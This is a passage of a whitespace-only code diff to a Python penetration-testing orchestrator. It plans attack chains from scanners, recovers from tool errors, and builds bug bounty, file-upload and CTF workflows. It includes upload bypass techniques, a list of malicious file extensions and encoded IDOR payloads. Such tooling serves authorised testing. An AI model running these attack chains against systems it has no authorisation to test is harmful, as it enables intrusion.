parameters""" params = {"report": "json"} - + # Set target based on context if context.get("kubernetes_target"): params["target"] = context["kubernetes_target"] @@ -1416,17 +1416,17 @@ class IntelligentDecisionEngine: params["cidr"] = context["cidr"] elif context.get("interface"): params["interface"] = context["interface"] - + # Enable active hunting if specified if context.get("active_hunting", False): params["active"] = True - + return params - + def _optimize_trivy_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Trivy parameters""" params = {"target": profile.target, "output_format": "json"} - + # Determine scan type based on target if profile.target.startswith(('docker.io/', 'gcr.io/', 'quay.io/')) or ':' in profile.target: params["scan_type"] = "image" @@ -1434,19 +1434,19 @@ class IntelligentDecisionEngine: params["scan_type"] = "fs" else: params["scan_type"] = "image" # Default - + # Set severity filter if context.get("severity"): params["severity"] = context["severity"] else: params["severity"] = "HIGH,CRITICAL" - + return params - + def _optimize_checkov_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Checkov parameters""" params = {"directory": profile.target, "output_format": "json"} - + # Detect framework based on files in directory if context.get("framework"): params["framework"] = context["framework"] @@ -1456,13 +1456,13 @@ class IntelligentDecisionEngine: params["framework"] = "terraform" elif any(f.endswith('.yaml') or f.endswith('.yml') for f in os.listdir(profile.target) if os.path.isfile(os.path.join(profile.target, f))): params["framework"] = "kubernetes" - + return params - + def create_attack_chain(self, profile: TargetProfile, objective: str = "comprehensive") -> AttackChain: """Create an intelligent attack chain based on target profile""" chain = AttackChain(profile) - + # Select attack pattern based on target type and objective if profile.target_type == TargetType.WEB_APPLICATION: if objective == "quick": @@ -1502,16 +1502,16 @@ class IntelligentDecisionEngine: pattern = self.attack_patterns["bug_bounty_high_impact"] else: pattern = self.attack_patterns["web_reconnaissance"] - + # Create attack steps for step_config in pattern: tool = step_config["tool"] optimized_params = self.optimize_parameters(tool, profile) - + # Calculate success probability based on tool effectiveness effectiveness = self.tool_effectiveness.get(profile.target_type.value, {}).get(tool, 0.5) success_prob = effectiveness * profile.confidence_score - + # Estimate execution time (simplified) time_estimates = { "nmap": 120, "gobuster": 300, "nuclei": 180, "nikto": 240, @@ -1524,7 +1524,7 @@ class IntelligentDecisionEngine: "docker-bench-security": 180, "falco": 120, "checkov": 240, "terrascan": 200 } exec_time = time_estimates.get(tool, 180) - + step = AttackStep( tool=tool, parameters=optimized_params, @@ -1532,13 +1532,13 @@ class IntelligentDecisionEngine: success_probability=success_prob, execution_time_estimate=exec_time ) - + chain.add_step(step) - + # Calculate overall chain metrics chain.calculate_success_probability() chain.risk_level = profile.risk_level - + return chain # Global decision engine instance @@ -1605,7 +1605,7 @@ class RecoveryStrategy: class IntelligentErrorHandler: """Advanced error handling with automatic recovery strategies""" - + def __init__(self): self.error_patterns = self._initialize_error_patterns() self.recovery_strategies = self._initialize_recovery_strategies() @@ -1613,51 +1613,51 @@ class IntelligentErrorHandler: self.parameter_adjustments = self._initialize_parameter_adjustments() self.error_history = [] self.max_history_size = 1000 - + def _initialize_error_patterns(self) -> Dict[str, ErrorType]: """Initialize error pattern recognition""" return { # Timeout patterns r"timeout|timed out|connection timeout|read timeout": ErrorType.TIMEOUT, r"operation timed out|command timeout": ErrorType.TIMEOUT, - + # Permission patterns r"permission denied|access denied|forbidden|not authorized": ErrorType.PERMISSION_DENIED, r"sudo required|root required|insufficient privileges": ErrorType.PERMISSION_DENIED, - + # Network patterns r"network unreachable|host unreachable|no route to host": ErrorType.NETWORK_UNREACHABLE, r"connection refused|connection reset|network error": ErrorType.NETWORK_UNREACHABLE, - + # Rate limiting patterns r"rate limit|too many requests|throttled|429": ErrorType.RATE_LIMITED, r"request limit exceeded|quota exceeded": ErrorType.RATE_LIMITED, - + # Tool not found patterns r"command not found|no such file or directory|not found": ErrorType.TOOL_NOT_FOUND, r"executable not found|binary not found": ErrorType.TOOL_NOT_FOUND, - + # Parameter patterns r"invalid argument|invalid option|unknown option": ErrorType.INVALID_PARAMETERS, r"bad parameter|invalid parameter|syntax error": ErrorType.INVALID_PARAMETERS, - + # Resource patterns r"out of memory|memory error|disk full|no space left": ErrorType.RESOURCE_EXHAUSTED, r"resource temporarily unavailable|too many open files": ErrorType.RESOURCE_EXHAUSTED, - + # Authentication patterns r"authentication failed|login failed|invalid credentials": ErrorType.AUTHENTICATION_FAILED, r"unauthorized|invalid token|expired token": ErrorType.AUTHENTICATION_FAILED, - + # Target patterns r"target unreachable|target not responding|target down": ErrorType.TARGET_UNREACHABLE, r"host not found|dns resolution failed": ErrorType.TARGET_UNREACHABLE, - + # Parsing patterns r"parse error|parsing failed|invalid format|malformed": ErrorType.PARSING_ERROR, r"json decode error|xml parse error|invalid json": ErrorType.PARSING_ERROR } - + def _initialize_recovery_strategies(self) -> Dict[ErrorType, List[RecoveryStrategy]]: """Initialize recovery strategies for different error types""" return { @@ -1868,7 +1868,7 @@ class IntelligentErrorHandler: ) ] } - + def _initialize_tool_alternatives(self) -> Dict[str, List[str]]: """Initialize alternative tools for fallback scenarios""" return { @@ -1876,58 +1876,58 @@ class IntelligentErrorHandler: "nmap": ["rustscan", "masscan", "zmap"], "rustscan": ["nmap", "masscan"], "masscan": ["nmap", "rustscan", "zmap"], - + # Directory/file discovery alternatives "gobuster": ["feroxbuster", "dirsearch", "ffuf", "dirb"], "feroxbuster": ["gobuster", "dirsearch", "ffuf"], "dirsearch": ["gobuster", "feroxbuster", "ffuf"], "ffuf": ["gobuster", "feroxbuster", "dirsearch"], - + # Vulnerability scanning alternatives "nuclei": ["jaeles", "nikto", "w3af"], "jaeles": ["nuclei", "nikto"], "nikto": ["nuclei", "jaeles", "w3af"], - + # Web crawling alternatives "katana": ["gau", "waybackurls", "hakrawler"], "gau": ["katana", "waybackurls", "hakrawler"], "waybackurls": ["gau", "katana", "hakrawler"], - + # Parameter discovery alternatives "arjun": ["paramspider", "x8", "ffuf"], "paramspider": ["arjun", "x8"], "x8": ["arjun", "paramspider"], - + # SQL injection alternatives "sqlmap": ["sqlninja", "jsql-injection"], - + # XSS testing alternatives "dalfox": ["xsser", "xsstrike"], - + # Subdomain enumeration alternatives "subfinder": ["amass", "assetfinder", "findomain"], "amass": ["subfinder", "assetfinder", "findomain"], "assetfinder": ["subfinder", "amass", "findomain"], - + # Cloud security alternatives "prowler": ["scout-suite", "cloudmapper"], "scout-suite": ["prowler", "cloudmapper"], - + # Container security alternatives "trivy": ["clair", "docker-bench-security"], "clair": ["trivy", "docker-bench-security"], - + # Binary analysis alternatives "ghidra": ["radare2", "ida", "binary-ninja"], "radare2": ["ghidra", "objdump", "gdb"], "gdb": ["radare2", "lldb"], - + # Exploitation alternatives "pwntools": ["ropper", "ropgadget"], "ropper": ["ropgadget", "pwntools"], "ropgadget": ["ropper", "pwntools"] } - + def _initialize_parameter_adjustments(self) -> Dict[str, Dict[ErrorType, Dict[str, Any]]]: """Initialize parameter adjustments for different error types and tools""" return { @@ -1957,11 +1957,11 @@ class IntelligentErrorHandler: ErrorType.RESOURCE_EXHAUSTED: {"threads": "5"} } } - + def classify_error(self, error_message: str, exception: Exception = None) -> ErrorType: """Classify error based on message and exception type""" error_text = error_message.lower() - + # Check exception type first if exception: if isinstance(exception, TimeoutError): @@ -1972,19 +1972,19 @@ class IntelligentErrorHandler: return ErrorType.NETWORK_UNREACHABLE elif isinstance(exception, FileNotFoundError): return ErrorType.TOOL_NOT_FOUND - + # Check error patterns for pattern, error_type in self.error_patterns.items(): if re.search(pattern, error_text, re.IGNORECASE): return error_type - + return ErrorType.UNKNOWN - + def handle_tool_failure(self, tool: str, error: Exception, context: Dict[str, Any]) -> RecoveryStrategy: """Determine best recovery action for tool failures""" error_message = str(error) error_type = self.classify_error(error_message, error) - + # Create error context error_context = ErrorContext( tool_name=tool, @@ -1997,26 +1997,26 @@ class IntelligentErrorHandler: stack_trace=traceback.format_exc(), system_resources=self._get_system_resources() ) - + # Add to error history self._add_to_history(error_context) - + # Get recovery strategies for this error type strategies = self.recovery_strategies.get(error_type, self.recovery_strategies[ErrorType.UNKNOWN]) - + # Select best strategy based on context best_strategy = self._select_best_strategy(strategies, error_context) - + error_message = f'{error_type.value} - Applying {best_strategy.action.value}' logger.warning(f"{ModernVisualEngine.format_error_card('RECOVERY', tool, error_message)}") - + return best_strategy - + def _select_best_strategy(self, strategies: List[RecoveryStrategy], context: ErrorContext) -> RecoveryStrategy: """Select the best recovery strategy based on context""" # Filter strategies based on attempt count viable_strategies = [s for s in strategies if context.attempt_count <= s.max_attempts] - + if not viable_strategies: # If all strategies exhausted, escalate to human return RecoveryStrategy( @@ -2027,25 +2027,25 @@ class IntelligentErrorHandler: success_probability=0.9, estimated_time=300 ) - + # Score strategies based on success probability and estimated time scored_strategies = [] for strategy in viable_strategies: # Adjust success probability based on previous failures adjusted_probability = strategy.success_probability * (0.9 ** (context.attempt_count - 1)) - + # Prefer strategies with higher success probability and lower time score = adjusted_probability - (strategy.estimated_time / 1000.0) scored_strategies.append((score, strategy)) - + # Return strategy with highest score scored_strategies.sort(key=lambda x: x[0], reverse=True) return scored_strategies[0][1] - + def auto_adjust_parameters(self, tool: str, error_type: ErrorType, original_params: Dict[str, Any]) -> Dict[str, Any]: """Automatically adjust tool parameters based on error patterns""" adjustments = self.parameter_adjustments.get(tool, {}).get(error_type, {}) - + if not adjustments: # Generic adjustments based on error type if error_type == ErrorType.TIMEOUT: @@ -2054,23 +2054,23 @@ class IntelligentErrorHandler: adjustments = {"delay": "2s", "threads": "3"} elif error_type == ErrorType.RESOURCE_EXHAUSTED: adjustments = {"threads": "3", "memory_limit": "1G"} - + # Apply adjustments to original parameters adjusted_params = original_params.copy() adjusted_params.update(adjustments) - + adjustment_info = f'Parameters adjusted: {adjustments}' logger.info(f"{ModernVisualEngine.format_tool_status(tool, 'RECOVERY', adjustment_info)}") - + return adjusted_params - + def get_alternative_tool(self, failed_tool: str, context: Dict[str, Any]) -> Optional[str]: """Get alternative tool for failed tool""" alternatives = self.tool_alternatives.get(failed_tool, []) - + if not alternatives: return None - + # Filter alternatives based on context requirements filtered_alternatives = [] for alt in alternatives: @@ -2079,13 +2079,13 @@ class IntelligentErrorHandler: if context.get('prefer_faster_tools') and alt in ['amass', 'w3af']: continue # Skip slower tools filtered_alternatives.append(alt) - + if not filtered_alternatives: filtered_alternatives = alternatives - + # Return first available alternative return filtered_alternatives[0] if filtered_alternatives else None - + def escalate_to_human(self, context: ErrorContext, urgency: str = "medium") -> Dict[str, Any]: """Escalate complex errors to human operator with full context""" escalation_data = { @@ -2103,18 +2103,18 @@ class IntelligentErrorHandler: "recent_errors": [e.error_message for e in context.previous_errors[-5:]] } } - + # Log escalation with enhanced formatting logger.error(f"{ModernVisualEngine.format_error_card('CRITICAL', context.tool_name, context.error_message, 'HUMAN ESCALATION REQUIRED')}") logger.error(f"{ModernVisualEngine.format_highlighted_text('ESCALATION DETAILS', 'RED')}") logger.error(f"{json.dumps(escalation_data, indent=2)}") - + return escalation_data - + def _get_human_suggestions(self, context: ErrorContext) -> List[str]: """Get human-readable suggestions for error resolution""" suggestions = [] - + if context.error_type == ErrorType.PERMISSION_DENIED: suggestions.extend([ "Run the command with sudo privileges", @@ -2141,9 +2141,9 @@ class IntelligentErrorHandler: ]) else: suggestions.append("Review error details and logs") - + return suggestions - + def _get_system_resources(self) -> Dict[str, Any]: """Get current system resource information""" try: @@ -2156,32 +2156,32 @@ class IntelligentErrorHandler: } except Exception: return {"error": "Unable to get system resources"} - + def _add_to_history(self, error_context: ErrorContext): """Add error context to history""" self.error_history.append(error_context) - + # Maintain history size limit if len(self.error_history) > self.max_history_size: self.error_history = self.error_history[-self.max_history_size:] - + def get_error_statistics(self) -> Dict[str, Any]: """Get error statistics for monitoring""" if not self.error_history: return {"total_errors": 0} - + error_counts = {} tool_errors = {} recent_errors = [] - + # Count errors by type and tool for error in self.error_history: error_type = error.error_type.value tool = error.tool_name - + error_counts[error_type] = error_counts.get(error_type, 0) + 1 tool_errors[tool] = tool_errors.get(tool, 0) + 1 - + # Recent errors (last hour) if (datetime.now() - error.timestamp).total_seconds() < 3600: recent_errors.append({ @@ -2189,7 +2189,7 @@ class IntelligentErrorHandler: "error_type": error_type, "timestamp": error.timestamp.isoformat() }) - + return { "total_errors": len(self.error_history), "error_counts_by_type": error_counts, @@ -2200,11 +2200,11 @@ class IntelligentErrorHandler: class GracefulDegradation: """Ensure system continues operating even with partial tool failures""" - + def __init__(self): self.fallback_chains = self._initialize_fallback_chains() self.critical_operations = self._initialize_critical_operations() - + def _initialize_fallback_chains(self) -> Dict[str, List[List[str]]]: """Initialize fallback tool chains for critical operations""" return { @@ -2234,30 +2234,30 @@ class GracefulDegradation: ["manual_testing"] # Manual parameter testing ] } - + def _initialize_critical_operations(self) -> Set[str]: """Initialize set of critical operations that must not fail completely""" return { "network_discovery", - "web_discovery", + "web_discovery", "vulnerability_scanning", "subdomain_enumeration" } - + def create_fallback_chain(self, operation: str, failed_tools: List[str] = None) -> List[str]: """Create fallback tool chain for critical operations""" if failed_tools is None: failed_tools = [] - + chains = self.fallback_chains.get(operation, []) - + # Find first chain that doesn't contain failed tools for chain in chains: viable_chain = [tool for tool in chain if tool not in failed_tools] if viable_chain: logger.info(f"๐Ÿ”„ Fallback chain for {operation}: {viable_chain}") return viable_chain - + # If no viable chain found, return basic fallback basic_fallbacks = { "network_discovery": ["ping"], @@ -2265,15 +2265,15 @@ class GracefulDegradation: "vulnerability_scanning": ["curl"], "subdomain_enumeration": ["dig"] } - + fallback = basic_fallbacks.get(operation, ["manual_testing"]) logger.warning(f"โš ๏ธ Using basic fallback for {operation}: {fallback}") return fallback - - def handle_partial_failure(self, operation: str, partial_results: Dict[str, Any], + + def handle_partial_failure(self, operation: str, partial_results: Dict[str, Any], failed_components: List[str]) -> Dict[str, Any]: """Handle partial results and fill gaps with alternative methods""" - + enhanced_results = partial_results.copy() enhanced_results["degradation_info"] = { "operation": operation, @@ -2282,36 +2282,36 @@ class GracefulDegradation: "fallback_applied": True, "timestamp": datetime.now().isoformat() } - + # Try to fill gaps based on operation type if operation == "network_discovery" and "open_ports" not in partial_results: # Try basic port check if full scan failed enhanced_results["open_ports"] = self._basic_port_check(partial_results.get("target")) - + elif operation == "web_discovery" and "directories" not in partial_results: # Try basic directory check enhanced_results["directories"] = self._basic_directory_check(partial_results.get("target")) - + elif operation == "vulnerability_scanning" and "vulnerabilities" not in partial_results: # Provide basic security headers check enhanced_results["vulnerabilities"] = self._basic_security_check(partial_results.get("target")) - + # Add recommendations for manual follow-up enhanced_results["manual_recommendations"] = self._get_manual_recommendations( operation, failed_components ) - + logger.info(f"๐Ÿ›ก๏ธ Graceful degradation applied for {operation}") return enhanced_results - + def _basic_port_check(self, target: str) -> List[int]: """Basic port connectivity check""" if not target: return [] - + common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995] open_ports = [] - + for port in common_ports: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -2322,17 +2322,17 @@ class GracefulDegradation: sock.close() except Exception: continue - + return open_ports - + def _basic_directory_check(self, target: str) -> List[str]: """Basic directory existence check""" if not target: return [] - + common_dirs = ["/admin", "/login", "/api", "/wp-admin", "/phpmyadmin", "/robots.txt"] found_dirs = [] - + for directory in common_dirs: try: url = f"{target.rstrip('/')}{directory}" @@ -2341,20 +2341,20 @@ class GracefulDegradation: found_dirs.append(directory) except Exception: continue - + return found_dirs - + def _basic_security_check(self, target: str) -> List[Dict[str, Any]]: """Basic security headers check""" if not target: return [] - + vulnerabilities = [] - + try: response = requests.get(target, timeout=10) headers = response.headers - + # Check for missing security headers security_headers = { "X-Frame-Options": "Clickjacking protection missing", @@ -2363,7 +2363,7 @@ class GracefulDegradation: "Strict-Transport-Security": "HTTPS enforcement missing", "Content-Security-Policy": "Content Security Policy missing" } - + for header, description in security_headers.items(): if header not in headers: vulnerabilities.append({ @@ -2372,20 +2372,20 @@ class GracefulDegradation: "description": description, "header": header }) - + except Exception as e: vulnerabilities.append({ "type": "connection_error", "severity": "info", "description": f"Could not perform basic security check: {str(e)}" }) - + return vulnerabilities - + def _get_manual_recommendations(self, operation: str, failed_components: List[str]) -> List[str]: """Get manual recommendations for failed operations""" recommendations = [] - + base_recommendations = { "network_discovery": [ "Manually test common ports using telnet or nc", @@ -2408,9 +2408,9 @@ class GracefulDegradation: "Perform manual DNS queries" ] } - + recommendations.extend(base_recommendations.get(operation, [])) - + # Add specific recommendations based on failed components for component in failed_components: if component == "nmap": @@ -2419,9 +2419,9 @@ class GracefulDegradation: recommendations.append("Try manual directory browsing") elif component == "nuclei": recommendations.append("Perform manual vulnerability testing") - + return recommendations - + def is_critical_operation(self, operation: str) -> bool: """Check if operation is critical and requires fallback""" return operation in self.critical_operations @@ -2443,10 +2443,10 @@ class BugBountyTarget: program_type: str = "web" # web, api, mobile, iot priority_vulns: List[str] = field(default_factory=lambda: ["rce", "sqli", "xss", "idor", "ssrf"]) bounty_range: str = "unknown" - + class BugBountyWorkflowManager: """Specialized workflow manager for bug bounty hunting""" - + def __init__(self): self.high_impact_vulns = { "rce": {"priority": 10, "tools": ["nuclei", "jaeles", "sqlmap"], "payloads": "command_injection"}, @@ -2458,7 +2458,7 @@ class BugBountyWorkflowManager: "xxe": {"priority": 6, "tools": ["nuclei"], "payloads": "xxe"}, "csrf": {"priority": 5, "tools": ["nuclei"], "payloads": "csrf"} } - + self.reconnaissance_tools = [ {"tool": "amass", "phase": "subdomain_enum", "priority": 1}, {"tool": "subfinder", "phase": "subdomain_enum", "priority": 2}, @@ -2469,7 +2469,7 @@ class BugBountyWorkflowManager: {"tool": "paramspider", "phase": "parameter_discovery", "priority": 7}, {"tool": "arjun", "phase": "parameter_discovery", "priority": 8} ] - + def create_reconnaissance_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create comprehensive reconnaissance workflow for bug bounty""" workflow = { @@ -2478,7 +2478,7 @@ class BugBountyWorkflowManager: "estimated_time": 0, "tools_count": 0 } - + # Phase 1: Subdomain Discovery subdomain_phase = { "name": "subdomain_discovery", @@ -2492,7 +2492,7 @@ class BugBountyWorkflowManager: "estimated_time": 300 } workflow["phases"].append(subdomain_phase) - + # Phase 2: HTTP Service Discovery http_phase = { "name": "http_service_discovery", @@ -2505,7 +2505,7 @@ class BugBountyWorkflowManager: "estimated_time": 180 } workflow["phases"].append(http_phase) - + # Phase 3: Content Discovery content_phase = { "name": "content_discovery", @@ -2520,7 +2520,7 @@ class BugBountyWorkflowManager: "estimated_time": 600 } workflow["phases"].append(content_phase) - + # Phase 4: Parameter Discovery param_phase = { "name": "parameter_discovery", @@ -2534,13 +2534,13 @@ class BugBountyWorkflowManager: "estimated_time": 240 } workflow["phases"].append(param_phase) - + # Calculate totals workflow["estimated_time"] = sum(phase["estimated_time"] for phase in workflow["phases"]) workflow["tools_count"] = sum(len(phase["tools"]) for phase in workflow["phases"]) - + return workflow - + def create_vulnerability_hunting_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create vulnerability hunting workflow prioritized by impact""" workflow = { @@ -2549,16 +2549,16 @@ class BugBountyWorkflowManager: "estimated_time": 0, "priority_score": 0 } - + # Sort vulnerabilities by priority - sorted_vulns = sorted(target.priority_vulns, - key=lambda v: self.high_impact_vulns.get(v, {}).get("priority", 0), + sorted_vulns = sorted(target.priority_vulns, + key=lambda v: self.high_impact_vulns.get(v, {}).get("priority", 0), reverse=True) - + for vuln_type in sorted_vulns: if vuln_type in self.high_impact_vulns: vuln_config = self.high_impact_vulns[vuln_type] - + vuln_test = { "vulnerability_type": vuln_type, "priority": vuln_config["priority"], @@ -2567,13 +2567,13 @@ class BugBountyWorkflowManager: "test_scenarios": self._get_test_scenarios(vuln_type), "estimated_time": vuln_config["priority"] * 30 # Higher priority = more time } - + workflow["vulnerability_tests"].append(vuln_test) workflow["estimated_time"] += vuln_test["estimated_time"] workflow["priority_score"] += vuln_config["priority"] - + return workflow - + def _get_test_scenarios(self, vuln_type: str) -> List[Dict[str, Any]]: """Get specific test scenarios for vulnerability types""" scenarios = { @@ -2603,9 +2603,9 @@ class BugBountyWorkflowManager: {"name": "Encoded IDOR", "payloads": ["id=MQ==", "id=Mg=="]} # base64 encoded 1,2 ] } - + return scenarios.get(vuln_type, []) - + def create_business_logic_testing_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create business logic testing workflow""" workflow = { @@ -2649,9 +2649,9 @@ class BugBountyWorkflowManager: "estimated_time": 480, # 8 hours for thorough business logic testing "manual_testing_required": True } - + return workflow - + def create_osint_workflow(self, target: BugBountyTarget) -> Dict[str, Any]: """Create OSINT gathering workflow""" workflow = { @@ -2693,12 +2693,12 @@ class BugBountyWorkflowManager: "estimated_time": 240, "intelligence_types": ["technical", "social", "business", "infrastructure"] } - + return workflow class FileUploadTestingFramework: """Specialized framework for file upload vulnerability testing""" - + def __init__(self): self.malicious_extensions = [ ".php", ".php3", ".php4", ".php5", ".phtml", ".pht", @@ -2706,7 +2706,7 @@ class FileUploadTestingFramework: ".py", ".rb", ".pl", ".cgi", ".sh", ".bat", ".cmd", ".exe" ] - + self.bypass_techniques = [ "double_extension", "null_byte", @@ -2715,7 +2715,7 @@ class FileUploadTestingFramework: "case_variation", "special_characters" ] - + def generate_test_files(self) -> Dict[str, Any]: """Generate various test files for upload testing""" test_files = { @@ -2734,9 +2734,9 @@ class FileUploadTestingFramework: {"name": "polyglot.jpg", "content": "GIF89a", "technique": "image_polyglot"} ] } - + return test_files - + def create_upload_testing_workflow(self, target_url: str) -> Dict[str, Any]: """Create comprehensive file upload testing workflow""" workflow = { @@ -2769,7 +2769,7 @@ class FileUploadTestingFramework: "estimated_time": 360, "risk_level": "high" } - + return workflow # Global bug bounty workflow manager @@ -2794,7 +2794,7 @@ class CTFChallenge: class CTFWorkflowManager: """Specialized workflow manager for CTF competitions""" - + def __init__(self): self.category_tools = { "web": { @@ -2847,7 +2847,7 @@ class CTFWorkflowManager: "geolocation": ["geoint", "osm-analysis", "satellite-imagery"] } } - + self.solving_strategies = { "web": [ {"strategy": "source_code_analysis", "description": "Analyze HTML/JS source for hidden information"}, @@ -2891,7 +2891,7 @@ class CTFWorkflowManager: {"strategy": "key_recovery", "description": "Extract encryption keys from binaries"} ] } - + def create_ctf_challenge_workflow(self, challenge: CTFChallenge) -> Dict[str, Any]: """Create advanced specialized workflow for CTF challenge with AI-powered optimization""" workflow = { @@ -2911,17 +2911,17 @@ class CTFWorkflowManager: "expected_artifacts": [], "validation_steps": [] } - + # Enhanced tool selection using CTFToolManager ctf_tool_manager = CTFToolManager() workflow["tools"] = ctf_tool_manager.suggest_tools_for_challenge(challenge.description, challenge.category) - + # Get category-specific strategies with enhanced intelligence if challenge.category in self.solving_strategies: workflow["strategies"] = self.solving_strategies[challenge.category] # Add fallback strategies for robustness workflow["fallback_strategies"] = self._generate_fallback_strategies(challenge.category) - + # Advanced time estimation with machine learning-like scoring base_times = { "easy": {"min": 15, "avg": 30, "max": 60}, @@ -2930,7 +2930,7 @@ class CTFWorkflowManager: "insane": {"min": 120, "avg": 240, "max": 480}, "unknown": {"min": 45, "avg": 90, "max": 180} } - + # Factor in category complexity category_multipliers = { "web": 1.0, @@ -2941,16 +2941,16 @@ class CTFWorkflowManager: "misc": 0.8, "osint": 0.9 } - + base_time = base_times[challenge.difficulty]["avg"] category_mult = category_multipliers.get(challenge.category, 1.0) - + # Adjust based on description complexity description_complexity = self._analyze_description_complexity(challenge.description) complexity_mult = 1.0 + (description_complexity * 0.3) - + workflow["estimated_time"] = int(base_time * category_mult * complexity_mult * 60) # Convert to seconds - + # Enhanced success probability calculation base_success = { "easy": 0.85, @@ -2959,31 +2959,31 @@ class CTFWorkflowManager: "insane": 0.25, "unknown": 0.55 }[challenge.difficulty] - + # Adjust based on tool availability and category expertise tool_availability_bonus = min(0.15, len(workflow["tools"]) * 0.02) workflow["success_probability"] = min(0.95, base_success + tool_availability_bonus) - + # Add advanced workflow components workflow["workflow_steps"] = self._create_advanced_category_workflow(challenge) workflow["parallel_tasks"] = self._identify_parallel_tasks(challenge.category) workflow["resource_requirements"] = self._calculate_resource_requirements(challenge) workflow["expected_artifacts"] = self._predict_expected_artifacts(challenge) workflow["validation_steps"] = self._create_validation_steps(challenge.category) - + return workflow - + def _select_tools_for_challenge(self, challenge: CTFChallenge, category_tools: Dict[str, List[str]]) -> List[str]: """Select appropriate tools based on challenge details""" selected_tools = [] - + # Always include reconnaissance tools for the category if "reconnaissance" in category_tools: selected_tools.extend(category_tools["reconnaissance"][:2]) # Top 2 recon tools - + # Add specialized tools based on challenge description description_lower = challenge.description.lower() - + if challenge.category == "web": if any(keyword in description_lower for keyword in ["sql", "injection", "database"]): selected_tools.append("sqlmap") @@ -2993,7 +2993,7 @@ class CTFWorkflowManager: selected_tools.append("wpscan") if any(keyword in description_lower for keyword in ["upload", "file"]): selected_tools.extend(["gobuster", "feroxbuster"]) - + elif challenge.category == "crypto": if any(keyword in description_lower for keyword in ["hash", "md5", "sha"]): selected_tools.extend(["hashcat", "john"]) @@ -3001,14 +3001,14 @@ class CTFWorkflowManager: selected_tools.extend(["rsatool", "factordb"]) if any(keyword in description_lower for keyword in ["cipher", "encrypt"]): selected_tools.extend(["cipher-identifier", "cyberchef"]) - + elif challenge.category == "pwn": selected_tools.extend(["checksec", "ghidra", "pwntools"]) if any(keyword in description_lower for keyword in ["heap", "malloc"]): selected_tools.append("glibc-heap-analysis") if any(keyword in description_lower for keyword in ["format", "printf"]): selected_tools.append("format-string-exploiter") - + elif challenge.category == "forensics": if any(keyword in description_lower for keyword in ["image", "jpg", "png"]): selected_tools.extend(["exiftool", "steghide", "stegsolve"]) @@ -3016,15 +3016,15 @@ class CTFWorkflowManager: selected_tools.append("volatility") if any(keyword in description_lower for keyword in ["network", "pcap"]): selected_tools.extend(["wireshark", "tcpdump"]) - + elif challenge.category == "rev": selected_tools.extend(["ghidra", "radare2", "strings"]) if any(keyword in description_lower for keyword in ["packed", "upx"]): selected_tools.extend(["upx", "peid"]) - + # Remove duplicates while preserving order return list(dict.fromkeys(selected_tools)) - + def _create_category_workflow(self, challenge: CTFChallenge) -> List[Dict[str, Any]]: """Create category-specific workflow steps""" workflows = { @@ -3069,7 +3069,7 @@ class CTFWorkflowManager: {"step": 6, "action": "flag_generation", "description": "Generate or extract the flag"} ] } - + return workflows.get(challenge.category, [ {"step": 1, "action": "analysis", "description": "Analyze the challenge"}, {"step": 2, "action": "research", "description": "Research relevant techniques"}, @@ -3078,7 +3078,7 @@ class CTFWorkflowManager: {"step": 5, "action": "refinement", "description": "Refine approach if needed"}, {"step": 6, "action": "flag_submission", "description": "Submit the flag"} ]) - + def create_ctf_team_strategy(self, challenges: List[CTFChallenge], team_size: int = 4) -> Dict[str, Any]: """Create team strategy for CTF competition""" strategy = { @@ -3088,7 +3088,7 @@ class CTFWorkflowManager: "estimated_total_time": 0, "expected_score": 0 } - + # Sort challenges by points/time ratio for optimal strategy challenge_efficiency = [] for challenge in challenges: @@ -3099,19 +3099,19 @@ class CTFWorkflowManager: "efficiency": efficiency, "workflow": workflow }) - + # Sort by efficiency (highest first) challenge_efficiency.sort(key=lambda x: x["efficiency"], reverse=True) - + # Allocate challenges to team members team_workload = [0] * team_size for i, item in enumerate(challenge_efficiency): # Assign to team member with least workload team_member = team_workload.index(min(team_workload)) - + if team_member not in strategy["challenge_allocation"]: strategy["challenge_allocation"][team_member] = [] - + strategy["challenge_allocation"][team_member].append({ "challenge": item["challenge"].name, "category": item["challenge"].category, @@ -3119,15 +3119,15 @@ class CTFWorkflowManager: "estimated_time": item["workflow"]["estimated_time"], "success_probability": item["workflow"]["success_probability"] }) - + team_workload[team_member] += item["workflow"]["estimated_time"] strategy["expected_score"] += item["challenge"].points * item["workflow"]["success_probability"] - + strategy["estimated_total_time"] = max(team_workload) strategy["priority_order"] = [item["challenge"].name for item in challenge_efficiency] - + return strategy - + def _generate_fallback_strategies(self, category: str) -> List[Dict[str, str]]: """Generate fallback strategies for when primary approaches fail""" fallback_strategies = { @@ -3182,18 +3182,18 @@ class CTFWorkflowManager: ] } return fallback_strategies.get(category, []) - + def _analyze_description_complexity(self, description: str) -> float: """Analyze challenge description complexity to adjust time estimates""" complexity_score = 0.0 description_lower = description.lower() - + # Length-based complexity if len(description) > 500: complexity_score += 0.3 elif len(description) > 200: complexity_score += 0.1 - + # Technical term density technical_terms = [ "algorithm", "encryption", "decryption", "vulnerability", "exploit", @@ -3202,17 +3202,17 @@ class CTFWorkflowManager: "reverse engineering", "binary analysis", "memory corruption", "heap", "stack", "rop", "shellcode", "payload" ] - + term_count = sum(1 for term in technical_terms if term in description_lower) complexity_score += min(0.4, term_count * 0.05) - + # Multi-step indicators multi_step_indicators = ["first", "then", "next", "after", "finally", "step"] step_count = sum(1 for indicator in multi_step_indicators if indicator in description_lower) complexity_score += min(0.3, step_count * 0.1) - + return min(1.0, complexity_score) - + def _create_advanced_category_workflow(self, challenge: CTFChallenge) -> List[Dict[str, Any]]: """Create advanced category-specific workflow with parallel execution support""" advanced_workflows = { @@ -3285,7 +3285,7 @@ class CTFWorkflowManager: {"step": 7, "action": "verification", "description": "Verify findings and extract flag", "parallel": False, "tools": ["manual"], "estimated_time": 600} ] } - + return advanced_workflows.get(challenge.category, [ {"step": 1, "action": "analysis", "description": "Analyze the challenge", "parallel": False, "tools": ["manual"], "estimated_time": 600}, {"step": 2, "action": "research", "description": "Research relevant techniques", "parallel": False, "tools": ["manual"], "estimated_time": 900}, @@ -3294,7 +3294,7 @@ class CTFWorkflowManager: {"step": 5, "action": "refinement", "description": "Refine approach if needed", "parallel": False, "tools": ["manual"], "estimated_time": 900}, {"step": 6, "action": "flag_submission", "description": 